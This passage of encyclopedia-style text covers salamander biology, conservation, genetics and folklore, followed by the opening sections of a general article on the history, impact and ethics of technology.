when they hatch. The tadpoles are carnivorous and the larval stage may last from days to years, depending on species. Sometimes this stage is completely bypassed, and the eggs of most lungless salamanders (Plethodontidae) develop directly into miniature versions of the adult without an intervening larval stage. By the end of the larval stage, the tadpoles already have limbs and metamorphosis takes place normally. In salamanders, this occurs over a short period of time and involves the closing of the gill slits and the loss of structures such as gills and tail fins that are not required as adults. At the same time, eyelids develop, the mouth becomes wider, a tongue appears, and teeth are formed. The aqueous larva emerges onto land as a terrestrial adult. Not all species of salamanders follow this path. Neoteny, also known as paedomorphosis, has been observed in all salamander families, and may be universally possible in all salamander species. In this state, an individual may retain gills or other juvenile features while attaining reproductive maturity. The changes that take place at metamorphosis are under the control of thyroid hormones and in obligate neotenes such as the axolotl (Ambystoma mexicanum), the tissues are seemingly unresponsive to the hormones. In other species, the changes may not be triggered because of underactivity of the hypothalamus-pituitary-thyroid mechanism which may occur when conditions in the terrestrial environment are too inhospitable. This may be due to cold or wildly fluctuating temperatures, aridity, lack of food, lack of cover, or insufficient iodine for the formation of thyroid hormones. Genetics may also play a part. The larvae of tiger salamanders (Ambystoma tigrinum), for example, develop limbs soon after hatching and in seasonal pools promptly undergo metamorphosis. Other larvae, especially in permanent pools and warmer climates, may not undergo metamorphosis until fully adult in size. Other populations in colder climates may not metamorphose at all, and become sexually mature while in their larval forms. Neoteny allows the species to survive even when the terrestrial environment is too harsh for the adults to thrive on land. Conservation A general decline in living amphibian species has been linked with the fungal disease chytridiomycosis. A higher proportion of salamander species than of frogs or caecilians are in one of the at-risk categories established by the IUCN. Salamanders showed a significant diminution in numbers in the last few decades of the 20th century, although no direct link between the fungus and the population decline has yet been found. The IUCN made further efforts in 2005 as they established the Amphibian Conservation Action Plan (ACAP), which was subsequently followed by Amphibian Ark (AArk), Amphibian Specialist Group (ASG), and finally the umbrella organization known as the Amphibian Survival Alliance (ASA). Researchers also cite deforestation, resulting in fragmentation of suitable habitats, and climate change as possible contributory factors. Species such as Pseudoeurycea brunnata and Pseudoeurycea goebeli that had been abundant in the cloud forests of Guatemala and Mexico during the 1970s were found by 2009 to be rare. Few data have been gathered on population sizes over the years and, by intensive surveying of historic and suitable new locations, it has been possible to locate individuals of other species, such as Parvimolge townsendi, which had been thought to be extinct. Currently, the major lines of defense for the conservation of Salamanders includes both in situ and ex situ conservation methods. There are efforts in place for certain members of the Salamander family to be conserved under a conservation breeding program (CBP) but there should be research done ahead of time to determine if the Salamander species is actually going to value from the CBP, as researchers have noted that some species of amphibians completely fail in this environment. Various conservation initiatives are being attempted around the world. The Chinese giant salamander, at 1.8 m (6 ft) the largest amphibian in the world, is critically endangered, as it is collected for food and for use in traditional Chinese medicine. An environmental education programme is being undertaken to encourage sustainable management of wild populations in the Qinling Mountains and captive breeding programmes have been set up. The hellbender is another large, long-lived species with dwindling numbers and fewer juveniles reaching maturity than previously. Another alarming finding is the increase in abnormalities in up to 90% of the hellbender population in the Spring River watershed in Arkansas. Habitat loss, silting of streams, pollution and disease have all been implicated in the decline and a captive breeding programme at Saint Louis Zoo has been successfully established. Of the 20 species of minute salamanders (Thorius spp.) in Mexico, half are believed to have become extinct and most of the others are critically endangered. Specific reasons for the decline may include climate change, chytridiomycosis, or volcanic activity, but the main threat is habitat destruction as logging, agricultural activities, and human settlement reduce their often tiny, fragmented ranges. Survey work is being undertaken to assess the status of these salamanders, and to better understand the factors involved in their population declines, with a view to taking action. Ambystoma mexicanum, an aquatic salamander, is a species protected under the Mexican UMA (Unit for Management and conservation of wildlife) as of April 1994. Another detrimental factor is that the axolotl lost their role as a top predator since the introduction of locally exotic species such as Nile tilapia and carp. Tilapia and carp directly compete with axolotls by consuming their eggs, larvae, and juveniles. Climate change has also immensely affected axolotls and their populations throughout the southern Mexico area. Due to its proximity to Mexico City, officials are currently working on programs at Lake Xochimilco to bring in tourism and educate the local population on the restoration of the natural habitat of these creatures. This proximity is a large factor that has impacted the survival of the axolotl, as the city has expanded to take over the Xochimilco region in order to make use of its resources for water and provision and sewage. It is farmed for use in research facilities and so may one day return to its natural habitat. The recent decline in population has substantially impacted genetic diversity among populations, making it difficult to further progress scientifically. Some genetic indiversity due to paedeomorphism in Ambystoma species such as the axolotl does not account for the overall lack of diversity. Evidence points toward a historical bottlenecking of Ambystoma that contributes to the variation issues and no longer a large genetic pool for it to pull from, thus raising concern for inbreeding due to lack of gene flow. One way researchers are looking into maintaining genetic diversity within the population is via cryopreservation of the spermatophores from the male axolotl. It is a safe and non-invasive method that requires the collection of the spermatophores and places them into a deep freeze for preservation. Most importantly, they have found that there is only limited damage done to the spermatophores upon thawing and thus it is a viable option. As of 2013, it is a method that is being used to save not only the axolotl but also numerous other members of the salamander family. Research is being done on the environmental cues that have to be replicated before captive animals can be persuaded to breed. Common species such as the tiger salamander and the mudpuppy are being given hormones to stimulate the production of sperm and eggs, and the role of arginine vasotocin in courtship behaviour is being investigated. Another line of research is artificial insemination, either in vitro or by inserting spermatophores into the cloacae of females. The results of this research may be used in captive-breeding programmes for endangered species. Taxonomy The order name Urodela comes from the name Urodèles given by André Marie Constant Duméril in 1805, it is derived from the Greek words ourā́ "tail" and dēlos "visible, conspicuous" because of their "persistent" tails. Disagreement exists among different authorities as to the definition of the terms Caudata and Urodela. Some maintain that the Urodela should be restricted to the crown group, with the Caudata being used for the total group. Others restrict the name Caudata to the crown group and use Urodela for the total group. The former approach seems to be most widely adopted and is used in this article. The ten families belonging to Urodela are divided into three suborders. The clade Neocaudata is often used to separate the Cryptobranchoidea and Salamandroidea from the Sirenoidea. Phylogeny and evolution The origins and evolutionary relationships between the three main groups of amphibians (gymnophionans, urodeles and anurans) is a matter of debate. A 2005 molecular phylogeny, based on rDNA analysis, suggested that the first divergence between these three groups took place soon after they had branched from the lobe-finned fish in the Devonian (around 360 million years ago), and before the breakup of the supercontinent Pangaea. The briefness of this period, and the speed at which radiation took place, may help to account for the relative scarcity of amphibian fossils that appear to be closely related to lissamphibians. More recent studies generally find more recent (Late Carboniferous to Permian) age for the basalmost divergence among lissamphibians. The earliest known salamander-line lissamphibian is Triassurus from the Middle-Late Triassic of Kyrgyzstan. Other fossil salamanders are known from the Middle-Late Jurassic of Eurasia, including Kokartus honorarius from the Middle Jurassic of Kyrgyzstan, two species of the apparently neotenic, aquatic Marmorerpeton from the Middle Jurassic of England and Scotland, and Karaurus from the Middle-Late Jurassic of Kazakhstan, resembled modern mole salamanders in morphology and probably had a similar burrowing lifestyle. They looked like robust modern salamanders but lacked a number of anatomical features that characterise all modern salamanders. The two groups of extant salamanders are the Cryptobranchoidea (which includes Asiatic and giant salamanders) and the Salamandroidea (which includes all other living salamanders), also known as Diadectosalamandroidei. Both groups are known from the Middle-Late Jurassic of China. the former being exemplified by Chunerpeton tianyiensis, Pangerpeton sinensis, Jeholotriton paradoxus, Regalerpeton weichangensis, Liaoxitriton daohugouensis and Iridotriton hechti, and the latter by Beiyanerpeton jianpingensis. By the Upper Cretaceous, most or all of the living salamander families had probably appeared. The following cladogram shows the relationships between salamander families based on the molecular analysis of Pyron and Wiens (2011). The position of the Sirenidae is disputed, but the position as sister to the Salamandroidea best fits with the molecular and fossil evidence. Genome and genetics Salamanders possess gigantic genomes, spanning the range from 14 Gb to 120 Gb (the human genome is 3.2 Gb long). The genomes of Pleurodeles waltl (20 Gb) and Ambystoma mexicanum (32 Gb) have been sequenced. Their giant genomes have strongly affected their physiology. This includes their skeletal and circulatory systems, and have led to a simplified brain, weak heart and slow metabolism. The cell mechanisms that prevents transposons to accumulate seems to be partially defect in salamanders. Some species with the largest genomes have lost the ability to go through metamorphosis. The development of the body is slower than its growth compared to their ancestors, and stops at a certain age, leaving them with embryonic traits. The salamander tissues contain cells that differentiates slowly, weakly, or not at all, due to intron delay, which gives them regenerative properties, which includes regenerating parts of the face and eye, lungs, liver, heart, and even the spinal cord and brain, and they have been described as "walking bags of stem cells". Research has also shown that they do not develop typical signs of aging and do not accumulate age-related diseases like cancer. In human society Myth and legend Legends have developed around the salamander over the centuries, many related to fire. This connection likely originates from the tendency of many salamanders to dwell inside rotting logs. When the log was placed into a fire, the salamander would attempt to escape, lending credence to the belief that salamanders were created from flames. The association of the salamander with fire appeared first in Antiquity with Aristotle (History of Animals 5, 17) and with Pliny the Elder writing in his Natural History (10, 86) that "A salamander is so cold that it puts out fire on contact. It vomits from its mouth a milky liquid; if this liquid touches any part of the human body, it causes all the hair to fall off, and the skin to change color and break out in a rash." The ability to put out fire is repeated by Saint Augustine in the fifth century and Isidore of Seville in the seventh century. The mythical ruler Prester John supposedly had a robe made from alleged salamander hair, in fact asbestos fibre, already known by ancient Greece and Rome (the linum vivum of Pliny the Elder Naturalis historia, 19, 4). The "Emperor of India" possessed a suit made from a thousand skins; Pope Alexander III had a tunic which he valued highly and William Caxton (1481) wrote: "This Salemandre berithe wulle, of which is made cloth and gyrdles that may not brenne in the fyre." The salamander was said to be so toxic that by twining around a tree, it could poison the fruit and so kill any who ate them and by falling into a well, could kill all who drank from it. Wealthy Persians amazed guests by cleaning a cloth by exposing it to fire. For example, according to Tabari, one of the curious items belonging to Khosrow II Parviz, the great Sassanian king (r. 590–628), was a napkin () that he cleaned simply by throwing it into fire. Such cloth is believed to have been made of asbestos imported over the Hindu Kush. According to Biruni in his book Gems, any cloths made of asbestos (, āzarshost) were called shostakeh (). Some Persians believed the fiber was the fur of an animal called the samandar (), which lived in fire and died when exposed to water; this may be where the belief originated that the salamander could tolerate fire. Charlemagne, the first Holy Roman Emperor (800–814), is also said to have possessed such a tablecloth. Marco Polo recounts having been shown, in a place he calls Ghinghin talas, "a good vein from which the cloth which we call of salamander, which cannot be burnt if it is thrown into the fire, is made ..." In his autobiography, Benvenuto Cellini relates: The Japanese giant salamander has been the subject of legend and artwork in Japan (e.g. the ukiyo-e work by Utagawa Kuniyoshi). The well-known Japanese mythological creature known as the kappa may be inspired by this salamander. Medical research Salamanders' limb regeneration has long been the focus of interest among scientists. The first extensive cell-level study was by Vincenzo Colucci in 1886. Researchers have been trying to find out the conditions required for the growth of new limbs and hope that such regeneration could be replicated in humans using stem cells. Axolotls have been used in research and have been genetically engineered so that a fluorescent protein is present in cells in the leg, enabling the cell division process to be tracked under the microscope. It seems that after the loss of a limb, cells draw together to form a clump known as a blastema. This superficially appears undifferentiated, but cells that originated in the skin later develop into new skin, muscle cells into new muscle and cartilage cells into new cartilage. It is only the cells from just beneath the surface of the skin that are pluripotent and able to develop into any type of cell. Researchers from the Australian Regenerative Medicine Institute have found that when macrophages were removed, salamanders lost their ability to regenerate and instead formed scar tissue. If the processes involved in forming new tissue can be reverse engineered into humans, it may be possible to heal injuries of the spinal cord or brain, repair damaged organs and reduce scarring and fibrosis after surgery. The spotted salamander (Amblystoma maculatum) lives in a symbiotic relationship with a green algae known as Oophila amblystomatis. The algal cells make their way into tissue cells throughout the embryo's body and appears to avoid rejection by activating genes which suppress the embryo's immune response. A mechanism that could be used in treatment for autoimmune diseases in humans. Brandy A 1995 article in the Slovenian weekly magazine Mladina publicized salamander brandy, a liquor supposedly indigenous to Slovenia. It was said to combine hallucinogenic with aphrodisiac effects and is made by putting several live salamanders in a barrel of fermenting fruit. Stimulated by the alcohol, they secrete toxic mucus in defense and eventually die. Besides causing hallucinations, the neurotoxins present in the brew were said to cause extreme sexual arousal. Later research by Slovenian anthropologist Miha Kozorog (University of Ljubljana) paints a very different picture—Salamander in brandy appears to have been traditionally seen as an adulterant, one which caused ill health. It was also used as a term of slander.
Biology and health sciences
Amphibians
null
29816
https://en.wikipedia.org/wiki/Technology
Technology
Technology is the application of conceptual knowledge to achieve practical goals, especially in a reproducible way. The word technology can also mean the products resulting from such efforts, including both tangible tools such as utensils or machines, and intangible ones such as software. Technology plays a critical role in science, engineering, and everyday life. Technological advancements have led to significant changes in society. The earliest known technology is the stone tool, used during prehistory, followed by the control of fire—which in turn contributed to the growth of the human brain and the development of language during the Ice Age, according to the cooking hypothesis. The invention of the wheel in the Bronze Age allowed greater travel and the creation of more complex machines. More recent technological inventions, including the printing press, telephone, and the Internet, have lowered barriers to communication and ushered in the knowledge economy. While technology contributes to economic development and improves human prosperity, it can also have negative impacts like pollution and resource depletion, and can cause social harms like technological unemployment resulting from automation. As a result, philosophical and political debates about the role and use of technology, the ethics of technology, and ways to mitigate its downsides are ongoing. Etymology Technology is a term dating back to the early 17th century that meant 'systematic treatment' (from Greek , from the and (), 'study, knowledge'). It is predated in use by the Ancient Greek word (), used to mean 'knowledge of how to make things', which encompassed activities like architecture. Starting in the 19th century, continental Europeans started using the terms (German) or (French) to refer to a 'way of doing', which included all technical arts, such as dancing, navigation, or printing, whether or not they required tools or instruments. At the time, (German and French) referred either to the academic discipline studying the "methods of arts and crafts", or to the political discipline "intended to legislate on the functions of the arts and crafts." The distinction between and is absent in English, and so both were translated as technology. The term was previously uncommon in English and mostly referred to the academic discipline, as in the Massachusetts Institute of Technology. In the 20th century, as a result of scientific progress and the Second Industrial Revolution, technology stopped being considered a distinct academic discipline and took on the meaning: the systemic use of knowledge to practical ends. History Prehistoric Tools were initially developed by hominids through observation and trial and error. Around 2 Mya (million years ago), they learned to make the first stone tools by hammering flakes off a pebble, forming a sharp hand axe. This practice was refined 75 kya (thousand years ago) into pressure flaking, enabling much finer work. The discovery of fire was described by Charles Darwin as "possibly the greatest ever made by man". Archaeological, dietary, and social evidence point to "continuous [human] fire-use" at least 1.5 Mya. Fire, fueled with wood and charcoal, allowed early humans to cook their food to increase its digestibility, improving its nutrient value and broadening the number of foods that could be eaten. The cooking hypothesis proposes that the ability to cook promoted an increase in hominid brain size, though some researchers find the evidence inconclusive. Archaeological evidence of hearths was dated to 790 kya; researchers believe this is likely to have intensified human socialization and may have contributed to the emergence of language. Other technological advances made during the Paleolithic era include clothing and shelter. No consensus exists on the approximate time of adoption of either technology, but archaeologists have found archaeological evidence of clothing 90-120 kya and shelter 450 kya. As the Paleolithic era progressed, dwellings became more sophisticated and more elaborate; as early as 380 kya, humans were constructing temporary wood huts. Clothing, adapted from the fur and hides of hunted animals, helped humanity expand into colder regions; humans began to migrate out of Africa around 200 kya, initially moving to Eurasia. Neolithic The Neolithic Revolution (or First Agricultural Revolution) brought about an acceleration of technological innovation, and a consequent increase in social complexity. The invention of the polished stone axe was a major advance that allowed large-scale forest clearance and farming. This use of polished stone axes increased greatly in the Neolithic but was originally used in the preceding Mesolithic in some areas such as Ireland. Agriculture fed larger populations, and the transition to sedentism allowed for the simultaneous raising of more children, as infants no longer needed to be carried around by nomads. Additionally, children could contribute labor to the raising of crops more readily than they could participate in hunter-gatherer activities. With this increase in population and availability of labor came an increase in labor specialization. What triggered the progression from early Neolithic villages to the first cities, such as Uruk, and the first civilizations, such as Sumer, is not specifically known; however, the emergence of increasingly hierarchical social structures and specialized labor, of trade and war among adjacent cultures, and the need for collective action to overcome environmental challenges such as irrigation, are all thought to have played a role. The invention of writing led to the spread of cultural knowledge and became the basis for history, libraries, schools, and scientific research. Continuing improvements led to the furnace and bellows and provided, for the first time, the ability to smelt and forge gold, copper, silver, and leadnative metals found in relatively pure form in nature. The advantages of copper tools over stone, bone and wooden tools were quickly apparent to early humans, and native copper was probably used from near the beginning of Neolithic times (about 10 kya). Native copper does not naturally occur in large amounts, but copper ores are quite common and some of them produce metal easily when burned in wood or charcoal fires. Eventually, the working of metals led to the discovery of alloys such as bronze and brass (about 4,000 BCE). The first use of iron alloys such as steel dates to around 1,800 BCE. Ancient After harnessing fire, humans discovered other forms of energy. The earliest known use of wind power is the sailing ship; the earliest record of a ship under sail is that of a Nile boat dating to around 7,000 BCE. From prehistoric times, Egyptians likely used the power of the annual flooding of the Nile to irrigate their lands, gradually learning to regulate much of it through purposely built irrigation channels and "catch" basins. The ancient Sumerians in Mesopotamia used a complex system of canals and levees to divert water from the Tigris and Euphrates rivers for irrigation. Archaeologists estimate that the wheel was invented independently and concurrently in Mesopotamia (in present-day Iraq), the Northern Caucasus (Maykop culture), and Central Europe. Time estimates range from 5,500 to 3,000 BCE with most experts putting it closer to 4,000 BCE. The oldest artifacts with drawings depicting wheeled carts date from about 3,500 BCE. More recently, the oldest-known wooden wheel in the world as of 2024 was found in the Ljubljana Marsh of Slovenia; Austrian experts have established that the wheel is between 5,100 and 5,350 years old. The invention of the wheel revolutionized trade and war. It did not take long to discover that wheeled wagons could be used to carry heavy loads. The ancient Sumerians used a potter's wheel and may have invented it. A stone pottery wheel found in the city-state of Ur dates to around 3,429 BCE, and even older fragments of wheel-thrown pottery have been found in the same area. Fast (rotary) potters' wheels enabled early mass production of pottery, but it was the use of the wheel as a transformer of energy (through water wheels, windmills, and even treadmills) that revolutionized the application of nonhuman power sources. The first two-wheeled carts were derived from travois and were first used in Mesopotamia and Iran in around 3,000 BCE. The oldest known constructed roadways are the stone-paved streets of the city-state of Ur, dating to , and timber roads leading through the swamps of Glastonbury, England, dating to around the same period. The first long-distance road, which came into use around 3,500 BCE, spanned 2,400 km from the Persian Gulf to the Mediterranean Sea, but was not paved and was only partially maintained. In around 2,000 BCE, the Minoans on the Greek island of Crete built a 50 km road leading from the palace of Gortyn on the south side of the island, through the mountains, to the palace of Knossos on the north side of the island. Unlike the earlier road, the Minoan road was completely paved. Ancient Minoan private homes had running water. A bathtub virtually identical to modern ones was unearthed at the Palace of Knossos. Several Minoan private homes also had toilets, which could be flushed by pouring water down the drain. The ancient Romans had many public flush toilets, which emptied into an extensive sewage system. The primary sewer in Rome was the Cloaca Maxima; construction began on it in the sixth century BCE and it is still in use today. The ancient Romans also had a complex system of aqueducts, which were used to transport water across long distances. The first Roman aqueduct was built in 312 BCE. The eleventh and final ancient Roman aqueduct was built in 226 CE. Put together, the Roman aqueducts extended over 450 km, but less than 70 km of this was above ground and supported by arches. Pre-modern Innovations continued through the Middle Ages with the introduction of silk production (in Asia and later Europe), the horse collar, and horseshoes. Simple machines (such as the lever, the screw, and the pulley) were combined into more complicated tools, such as the wheelbarrow, windmills, and clocks. A system of universities developed and spread scientific ideas and practices, including Oxford and Cambridge. The Renaissance era produced many innovations, including the introduction of the movable type printing press to Europe, which facilitated the communication of knowledge. Technology became increasingly influenced by science, beginning a cycle of mutual advancement. Modern Starting in the United Kingdom in the 18th century, the discovery of steam power set off the Industrial Revolution, which saw wide-ranging technological discoveries, particularly in the areas of agriculture, manufacturing, mining, metallurgy, and transport, and the widespread application of the factory system. This was followed a century later by the Second Industrial Revolution which led to rapid scientific discovery, standardization, and mass production. New technologies were developed, including sewage systems, electricity, light bulbs, electric motors, railroads, automobiles, and airplanes. These technological advances led to significant developments in medicine, chemistry, physics, and engineering. They were accompanied by consequential social change, with the introduction of skyscrapers accompanied by rapid urbanization. Communication improved with the invention of the telegraph, the telephone, the radio, and television. The 20th century brought a host of innovations. In physics, the discovery of nuclear fission in the Atomic Age led to both nuclear weapons and nuclear power. Analog computers were invented and asserted dominance in processing complex data. While the invention of vacuum tubes allowed for digital computing with computers like the ENIAC, their sheer size precluded widespread use until innovations in quantum physics allowed for the invention of the transistor in 1947, which significantly compacted computers and led the digital transition. Information technology, particularly optical fiber and optical amplifiers, allowed for simple and fast long-distance communication, which ushered in the Information Age and the birth of the Internet. The Space Age began with the launch of Sputnik 1 in 1957, and later the launch of crewed missions to the moon in the 1960s. Organized efforts to search for extraterrestrial intelligence have used radio telescopes to detect signs of technology use, or technosignatures, given off by alien civilizations. In medicine, new technologies were developed for diagnosis (CT, PET, and MRI scanning), treatment (like the dialysis machine, defibrillator, pacemaker, and a wide array of new pharmaceutical drugs), and research (like interferon cloning and DNA microarrays). Complex manufacturing and construction techniques and organizations are needed to make and maintain more modern technologies, and entire industries have arisen to develop succeeding generations of increasingly more complex tools. Modern technology increasingly relies on training and education – their designers, builders, maintainers, and users often require sophisticated general and specific training. Moreover, these technologies have become so complex that entire fields have developed to support them, including engineering, medicine, and computer science; and other fields have become more complex, such as construction, transportation, and architecture. Impact Technological change is the largest cause of long-term economic growth. Throughout human history, energy production was the main constraint on economic development, and new technologies allowed humans to significantly increase the amount of available energy. First came fire, which made edible a wider variety of foods, and made it less physically demanding to digest them. Fire also enabled smelting, and the use of tin, copper, and iron tools, used for hunting or tradesmanship. Then came the agricultural revolution: humans no longer needed to hunt or gather to survive, and began to settle in towns and cities, forming more complex societies, with militaries and more organized forms of religion. Technologies have contributed to human welfare through increased prosperity, improved comfort and quality of life, and medical progress, but they can also disrupt existing social hierarchies, cause pollution, and harm individuals or groups. Recent years have brought about a rise in social media's cultural prominence, with potential repercussions on democracy, and economic and social life. Early on, the internet was seen as a "liberation technology" that would democratize knowledge, improve access to education, and promote democracy. Modern research has turned to investigate the internet's downsides, including disinformation, polarization, hate speech, and propaganda. Since the 1970s, technology's impact on the environment has been criticized, leading to a surge in investment in solar, wind, and other forms of clean energy. Social Jobs Since the invention of the wheel, technologies have helped increase humans' economic output. Past automation has both substituted and complemented labor; machines replaced humans at some lower-paying jobs (for example in agriculture), but this was compensated by the creation of new, higher-paying jobs. Studies have found that computers did not create significant net technological unemployment. Due to artificial intelligence being far more capable than computers, and still being in its infancy, it is not known whether it will follow the same trend; the question has been debated at length among economists and policymakers. A 2017 survey found no clear consensus among economists on whether AI would increase long-term unemployment. According to the World Economic Forum's "The Future of Jobs Report 2020", AI is predicted to replace 85 million jobs worldwide, and create 97 million new jobs by 2025. From 1990 to 2007, a study in the U.S. by MIT economist Daron Acemoglu showed that an addition of one robot for every 1,000 workers decreased the employment-to-population ratio by 0.2%, or about 3.3 workers, and lowered wages by 0.42%. Concerns about technology replacing human labor however are long-lasting. As US president Lyndon Johnson said in 1964, "Technology is creating both new opportunities and new obligations for us, opportunity for greater productivity and progress; obligation to be sure that no workingman, no family must pay an unjust price for progress." upon signing the National Commission on Technology, Automation, and Economic Progress bill. Security With the growing reliance of technology, there have been security and privacy concerns along with it. Billions of people use different online payment methods, such as WeChat Pay, PayPal, Alipay, and much more to help transfer money. Although security measures are placed, some criminals are able to bypass them. In March 2022, North Korea used Blender.io, a mixer which helped them to hide their cryptocurrency exchanges, to launder over $20.5 million in cryptocurrency, from Axie Infinity, and steal over $600 million worth of cryptocurrency from the game's owner. Because of this, the U.S. Treasury Department sanctioned Blender.io, which marked the first time it has taken action against a mixer, to try to crack down on North Korean hackers. The privacy of cryptocurrency has been debated. Although many customers like the privacy of cryptocurrency, many also argue that it needs more transparency and stability. Environmental Technology can have both positive and negative effects on the environment. Environmental technology, describes an array of technologies which seek to reverse, mitigate or halt environmental damage to the environment. This can include measures to halt pollution through environmental regulations, capture and storage of pollution, or using pollutant byproducts in other industries. Other examples of environmental technology include deforestation and the reversing of deforestation. Emerging technologies in the fields of climate engineering may be able to halt or reverse global warming and its environmental impacts, although this remains highly controversial. As technology has advanced, so too has the negative environmental impact, with increased release of greenhouse gases, including methane, nitrous oxide and carbon dioxide, into the atmosphere, causing the greenhouse effect. This continues to gradually heat the earth, causing global warming and climate change. Measures of technological innovation correlates with a rise in greenhouse gas emissions. Pollution Pollution, the presence of contaminants in an environment that causes adverse effects, could have been present as early as the Inca Empire. They used a lead sulfide flux in the smelting of ores, along with the use of a wind-drafted clay kiln, which released lead into the atmosphere and the sediment of rivers. Philosophy Philosophy of technology is a branch of philosophy that studies the "practice of designing and creating artifacts", and the "nature of the things so created." It emerged as a discipline over the past two centuries, and has grown "considerably" since the 1970s. The humanities philosophy of technology is concerned with the "meaning of technology for, and its impact on, society and culture". Initially, technology was seen as an extension of the human organism that replicated or amplified bodily and mental faculties. Marx framed it as a tool used by capitalists to oppress the proletariat, but believed that technology would be a fundamentally liberating force once it was "freed from societal deformations". Second-wave philosophers like Ortega later shifted their focus from economics and politics to "daily life and living in a techno-material culture", arguing that technology could oppress "even the members of the bourgeoisie who were its ostensible masters and possessors." Third-stage philosophers like Don Ihde and Albert Borgmann represent a turn toward de-generalization and empiricism, and considered how humans can learn to live with technology. Early scholarship on technology was split between two arguments: technological determinism, and social construction. Technological determinism is the idea that technologies cause unavoidable social changes. It usually encompasses a related argument, technological autonomy, which asserts that technological progress follows a natural progression and cannot be prevented. Social constructivists argue that technologies follow no natural progression, and are shaped by cultural values, laws, politics, and economic incentives. Modern scholarship has shifted towards an analysis of sociotechnical systems, "assemblages of things, people, practices, and meanings", looking at the value judgments that shape technology. Cultural critic Neil Postman distinguished tool-using societies from technological societies and from what he called "technopolies", societies that are dominated by an ideology of technological and scientific progress to the detriment of other cultural practices, values, and world views. Herbert Marcuse and John Zerzan suggest that technological society will inevitably deprive us of our freedom and psychological health. Ethics The ethics of technology is an interdisciplinary subfield of ethics that analyzes technology's ethical implications and explores ways to mitigate potential negative impacts of new technologies. There is a broad range of ethical issues revolving around technology, from specific areas of focus affecting professionals working with technology to broader social, ethical, and legal issues concerning the role of technology in society and everyday life. Prominent debates have surrounded genetically modified organisms, the use of robotic soldiers, algorithmic bias, and the issue of aligning AI behavior with human values. Technology ethics encompasses several key fields: Bioethics looks at ethical issues surrounding biotechnologies and modern medicine, including cloning, human genetic engineering, and stem cell research. Computer ethics focuses on issues related to computing. Cyberethics explores internet-related issues like intellectual property rights, privacy, and censorship. Nanoethics examines issues surrounding the alteration of matter at the atomic and molecular level in various disciplines including computer science, engineering, and biology. And engineering ethics deals with the professional standards of engineers, including software engineers and their moral responsibilities to the public. A wide branch of technology ethics is concerned with the ethics of artificial intelligence: it includes robot ethics, which deals with ethical issues involved in the design, construction, use, and treatment of robots, as well as machine ethics, which is concerned with ensuring the ethical behavior of artificially intelligent agents. Within the field of AI ethics, significant yet-unsolved research problems include AI alignment (ensuring that AI behaviors are aligned with their creators' intended goals and interests) and the reduction of algorithmic bias. Some researchers have warned against the hypothetical risk of an AI takeover, and have advocated for the use of AI capability control in addition to AI alignment methods. Other fields of ethics have had to contend with technology-related issues, including military ethics, media ethics, and educational ethics. Futures studies Futures studies is the study of social and technological progress. It aims to explore the range of plausible futures and incorporate human values in the development of new technologies. More generally, futures researchers are interested in improving "the freedom and welfare of humankind". It relies on a thorough quantitative and qualitative analysis of past and present technological trends, and attempts to rigorously extrapolate them into the future. Science fiction is often used as a source of ideas. Futures research methodologies include survey research, modeling, statistical analysis, and computer simulations. Existential risk Existential risk researchers analyze risks that could lead to human extinction or civilizational collapse, and look for ways to build resilience against them. Relevant research centers include the Cambridge Center for the Study of Existential Risk, and the Stanford Existential Risk Initiative. Future technologies may contribute to the risks of artificial general intelligence, biological warfare, nuclear warfare, nanotechnology, anthropogenic climate change, global warming, or stable global totalitarianism, though technologies may also help us mitigate asteroid impacts and gamma-ray bursts. In 2019 philosopher Nick Bostrom introduced the notion of a vulnerable world, "one in which there is some level of technological development at which civilization almost certainly gets devastated by default", citing the risks of a pandemic caused by bioterrorists, or an arms race triggered by the development of novel armaments and the loss of mutual assured destruction. He invites policymakers to question the assumptions that technological progress is always beneficial, that scientific openness is always preferable, or that they can afford to wait until a dangerous technology has been invented before they prepare mitigations. Emerging technologies Emerging technologies are novel technologies whose development or practical applications are still largely unrealized. They include nanotechnology, biotechnology, robotics, 3D printing, and blockchains. In 2005, futurist Ray Kurzweil claimed the next technological revolution would rest upon advances in genetics, nanotechnology, and robotics, with robotics being the most impactful of the three technologies. Genetic engineering will allow far greater control over human biological nature through a process called directed evolution. Some thinkers believe that this may shatter our sense of self, and have urged for renewed public debate exploring the issue more thoroughly; others fear that directed evolution could lead to eugenics or extreme social inequality. Nanotechnology will grant us the ability to manipulate matter "at the molecular and atomic scale", which could allow us to reshape ourselves and our environment in fundamental ways. Nanobots could be used within the human body to destroy cancer cells or form new body parts, blurring the line between biology and technology. Autonomous robots have undergone rapid progress, and are expected to replace humans at many dangerous tasks, including search and rescue, bomb disposal, firefighting, and war. Estimates on the advent of artificial general intelligence vary, but half of machine learning experts surveyed in 2018 believe that AI will "accomplish every task better and more cheaply" than humans by 2063, and automate all human jobs by 2140. This expected technological unemployment has led to calls for increased emphasis on computer science education and debates about universal basic income. Political science experts predict that this could lead to a rise in extremism, while others see it as an opportunity to usher in a post-scarcity economy. Movements Appropriate technology Some segments of the 1960s hippie counterculture grew to dislike urban living and developed a preference for locally autonomous, sustainable, and decentralized technology, termed appropriate technology. This later influenced hacker culture and technopaganism. Technological utopianism Technological utopianism refers to the belief that technological development is a moral good, which can and should bring about a utopia, that is, a society in which laws, governments, and social conditions serve the needs of all its citizens. Examples of techno-utopian goals include post-scarcity economics, life extension, mind uploading, cryonics, and the creation of artificial superintelligence. Major techno-utopian movements include transhumanism and singularitarianism. The transhumanism movement is founded upon the "continued evolution of human life beyond its current human form" through science and technology, informed by "life-promoting principles and values." The movement gained wider popularity in the early 21st century. Singularitarians believe that machine superintelligence will "accelerate technological progress" by orders of magnitude and "create even more intelligent entities ever faster", which may lead to a pace of societal and technological change that is "incomprehensible" to us. This event horizon is known as the technological singularity. Major figures of techno-utopianism include Ray Kurzweil and Nick Bostrom. Techno-utopianism has attracted both praise and criticism from progressive, religious, and conservative thinkers. Anti-technology backlash Technology's central role in our lives has drawn concerns and backlash. The backlash against technology is not a uniform movement and encompasses many heterogeneous ideologies. The earliest known revolt against technology was Luddism, a pushback against early automation in textile production. Automation had resulted in a need for fewer workers, a process known as technological unemployment. Between the 1970s and 1990s, American terrorist Ted Kaczynski carried out a series of bombings across America and published the Unabomber Manifesto denouncing technology's negative impacts on nature and human freedom. The essay resonated with a large part of the American public. It was partly inspired by Jacques Ellul's The Technological Society. Some subcultures, like the off-the-grid movement, advocate a withdrawal from technology and a return to nature. The ecovillage movement seeks to reestablish harmony between technology and nature. Relation to science and engineering Engineering is the process by which technology is developed. It often requires problem-solving under strict constraints. Technological development is "action-oriented", while scientific knowledge is fundamentally explanatory. Polish philosopher Henryk Skolimowski framed it like so: "science concerns itself with what , technology with what ." The direction of causality between scientific discovery and technological innovation has been debated by scientists, 